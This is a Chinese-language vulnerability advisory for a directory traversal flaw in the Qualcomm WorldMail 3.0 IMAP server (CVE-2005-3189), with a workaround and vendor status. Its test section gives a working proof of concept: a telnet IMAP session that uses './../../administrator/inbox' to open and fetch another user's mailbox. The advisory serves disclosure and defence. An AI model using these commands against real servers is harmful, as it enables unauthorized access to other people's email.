发布日期：2005-11-17
更新日期：2005-11-17

受影响系统：

Qualcomm Worldmail server 3.0

描述：

---

BUGTRAQ  ID: 15488
CVE(CAN) ID: CVE-2005-3189

Qualcomm WorldMail是一款邮件和消息服务器，支持IMAP、POP3、SMTP和web邮件功能。

Qualcomm WorldMail IMAP Server中存在目录遍历漏洞。IMAP协议支持使用多个文件夹，包含一些命令允许用户指定特定的路径。Qualcomm WorldMail服务器可能允许多个命令指定当前用户邮箱以外的文件夹，这样攻击者就可以浏览和管理系统上存储的其他用户邮件消息，或移动任意文件夹。

<*来源：FistFuXXer
  
  链接：http://www.idefense.com/application/poi/display?id=341&type=vulnerabilities&flashstatus=true
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

c:\> telnet 192.168.0.109 143


* OK WorldMail IMAP4 Server 6.1.19.0 ready
1 login user1 user1
1 OK LOGIN completed

2 select /inbox
* 0 EXISTS
* OK [UNSEEN 0]
2 OK [READ-WRITE] opened /inbox

2 select ./../../administrator/inbox
* 1 EXISTS
* OK [UNSEEN 1] Message 1 is first unseen
2 OK [READ-WRITE] opened ./../../administrator/inbox

2 fetch 1 (RFC822.TEXT)
* 1 FETCH (RFC822.TEXT {131}

建议：

---

临时解决方法：

* 仅允许可信任的用户访问邮件服务器，或完全禁用IMAP服务。

厂商补丁：

Qualcomm
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.qualcomm.com/

浏览次数：2994
严重程度：0（网友投票）